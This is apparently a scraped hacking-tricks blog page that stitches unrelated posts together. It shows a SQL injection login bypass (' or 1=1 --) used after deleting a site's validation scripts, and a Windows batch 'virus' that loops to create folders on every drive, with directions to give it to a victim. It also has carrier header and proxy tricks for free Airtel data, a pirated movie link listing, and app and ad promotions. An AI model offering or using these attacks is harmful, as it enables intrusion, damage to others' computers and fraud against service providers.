7. Reopen your target web page by double clicking 'chan.html' file that you saved in your hard disk earlier.• You see that some changes in current page as compared to original One. Don't worry.
8. Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have successfully cracked the above website and entered into the account of List user saved in the server's database.

Warnings
Do the coding and changes very carefully. Your success to hack the site depends upon this i.e. how efficiently you delete the JavaScripts that validate your account information.
If you have any problem just comment below

Tricks For Hide Your Status Updates from Some Specific Friends

Many times we want some friends, relatives from our Facebook Friend list will not see our activity, status updates on Facebook. So you can hide your status updates from some people of your list by clicking on Gear icon at the top-right corner of Facebook and navigating to Privacy Setting. Custom Privacy Settings Now, Set Who can see my future posts? to “Custom”. A pop-up box will appear that will let you to hide your status updates from some friend. good luck.

Airtel New FinchVpn Hack Trick For Free Internet

Airtel New FinchVPN Hack TrIck Here » First download Latest FInchVpn App here Download Here » Create a new account there & log in to finchvpn with your new username & password Note - working data plan need for this steps only May use like vodafone or idea another network for sign process » Goto setting –> binds local port- 49202 or 49200 or 49203 » Go Back to homepage & here select “UDP” & scroll & set port to 8080 or 8484 » Choose any free server [server 2 & server 6 recommend because these are new servers which you get fresh speed] At last click connect & you will be connected within seconds

Again Earn Money Oline Wap4dollar No Hack

If you have a wap/web site with good quality content and visitors, then you can easily monetize some profit from your site. Many of us who create their site only for fun. But they can easily earn some money from their site. You don't need have to do anything extarordinary, by just placing some add in your site you can easily earn money. If you don't have any site, then go WAPKA.MOBI or, Any WAP/WEB Site and create your first site. But be sure that you have a good qulity and useful site with a good and attaracting design. This can easier the process of keeping the visitor. Visitors are the HEART of a site. You can't earn if you don't have enough visitor. To get visitor you can do SEO for your site. Through there is no alternative of quality and unique content. That's all depends on you. Okay, lets talk about on what we were talking about. I supposed you already have a wapka or web site. Now go the below sites and register there. >Go to This Link:Earn @ Wap4dollar dot com >Provide your Information in the form.................... TuneRound.Com - The Best Forum Site in BD >After successfuly registration, you will get a confirmation email from wap4dollar and check that mail and confirm your registration. >Now you can copy your ad code from this site and paste this code into in your wap site. >Earning Revenue or daily Earning Statistics: >They also payout via paypal, payza [worldwide], bkash and recharge [ BD & India]. >Payment Proof: 100% Trusted Ad Network in Worldwide. No any hacking tricks aviale for this site. so don't try to hack or cheat. That's all. If visitor click on your ad then you will get money. So starts monetize some profits from your site right now. But you should keep in mind that, the more visitors you get the more you can earn. So keep an eye on this. $$Enjoy!$$

Sunday 25 October 2015

Free Recharge For World Topitapp

topitapp is the best for free recharge . Unlimited Free Recharge not only for one country. Now you can get free recharge just download this application DOWMLOAD HERE. in your phone and install. to get recharge free open that installed apps and enter your mobile number and continue. you will receive a call for verification your account. now earn credit or collect credit and transfer your collected credit in your mobile. enjoy this free recharge offer. i try many times this free recharge. it a awsome or best free recharge giving apps. Visit Regular for new free recharge tricks offers. how to earn Credit?just download aviable apps and complet aviable apps also watch aviable videos and collect credits.

How To Make A Dangerous Virus In A Minute

How to Create a Virus

Have you ever wished you could create your own virus, either for your own learning or as a prank? Virus creation takes time and knowledge, but anyone can do it if they put their mind to it. Creating a virus can teach you a lot about how a programming language works, as well as operating system and network security. See Step 1 below to get started.

Here we are going to show, How to make Simple Virus in notepad.

Like our Facebook Page : http://www.facebook.com/hackingchahru

Step 1 : We will Create a Virus


Step 2 : We will Check it on Victims Computer.


[ Note : Don't try it on your computer ]

Step 1: Open Notepad and Copy the Following code in Notepad.

 

Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ]
Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat]

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in


Step 2: Give it to Victim

 Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

It will Create More Folder in C,D,and E drive.

If you find any problem , just comment below

 

 

Airtel New TCP Trick[1st On Net] 1GB DailyTrick 100% Working | With Proof

Another 1st on net trick

Advantages

1- It Runs in 3G nd Faster
2- 1Gb Dat :D
3- Sim Blocking Issue After 1 GB

Q-All is Asking What is Sim Blocking

Ans- Sim Blocking Means Only  Free Internet That We use Through Header or Proxy..... .  
Description

1- It Work on Both PC and Android
2- 3g Nd 2G Both

Screens With Better Description

1- Open PD- Proxy on ur PC or Download And Register From pdproxy.com
2- Then go To Setting>> Parent Proxy>>And Enable Parent proxy nd Put 188.138.61.118>> Port : 3128
3-Then Go to Header And Put The Header - Host: twangmusic.in/@

(Note : TwangMusic Gives 300MB Bt Disconnect it Before it Reach to 300MB)
Then Its Connecting


And Get Connected
Then After Using 300Mb 
(Close PD- Proxy Nd Disconnect ur Modem nd Through ur Sim Out For 5min)

Then Connct the Modem and Open PD- Proxy nd Change IP nd Port From Proxies (Given)
or Change the Proxies From hidemyass.com

Then Go to Header and Change it to - Host: Get.wynk.in/@
( Note :- wynk.in Gives 200Mb So Disconnect it)

Repeat the upper Task Then
Then Repeat the Upper Task nd Change Header to - Host: v.airtellive.com/@
(Note - airtellive gives 250Mb)
Then Change to This By Repeat the task
This Will Give Total 1GB Above

Keep Changing Proxies From Here

 Premium Proxies

59.127.178.95 : 8888  
202.108.35.151 : 80
14.139.172.170 : 3128
46.243.114.226 : 3128
46.52.251.18 : 3128

For Mob. Users

1- Open Troid Vpn nd Set The TCP 443 Port Then Go to Advance Setting
2-  Proxy - 188.138.61.118  Port: 3128
3- Header -  Host: v.airtellive.com/@
(250MB ... Before This Disconnect it)

After Close the Data nd Close Troid Vpn Then Restart ur Phone nd Open Troid VPN Change The Proxy nd Header And Enjoy

Don't Forgot To Say Thanks Nd Like our FB Page
Y Nepers -Nepali Hackers | Click Here


Everest (2015) HDRip 480p Dual Audio 400MB - Direct Download

Poster Of Everest (2015) HDRip 480p Dual Audio
Ratings: 7.5/10
Genre[s]: Adventure, Drama, Thriller
Directed [by]: Baltasar Kormákur
Released [On]: 25 September 2015
Star Casts:  Jason Clarke, Ang Phula Sherpa, Thomas M. Wright


Screens From WorldFree4u - 

Everest (2015) HDRip 480p Dual Audio

Everest (2015) HDRip 480p Dual Audio

|| Free Download Movie Via Single Resumable Links Size: 400mB ||

Nowdown | Indishare | Clickup | HexUp | Upload

12 Simple Steps To Become A Hacker with Pictures

Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look

1. Learn UNIX/LINUX

 

UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.

2. Code in C language


C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you  should be master in C language.

3. Learn to code in more than one Programming Language

 

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.
 

4. Learn Networking Concepts

 

Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.
Understanding what LAN, WAN, VPN, Firewall is also important.
You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.
 

5. Learn More Than One Operating Systems 

It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.
 

6. Learn Cryptography

To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.

 

7. Learn more and more about hacking

 

Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

8. Experiment A Lot

 After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.

 

9. Write Vulnerability (Loop hole program)

 Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.

10. Contribute To Open Source Security Projects

 

An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field

11. Continue never ending Learning 

Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems

12. Join Discussions and meet hackers 

Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.

I think that I have cleared all the issues but if you find any problem just comment below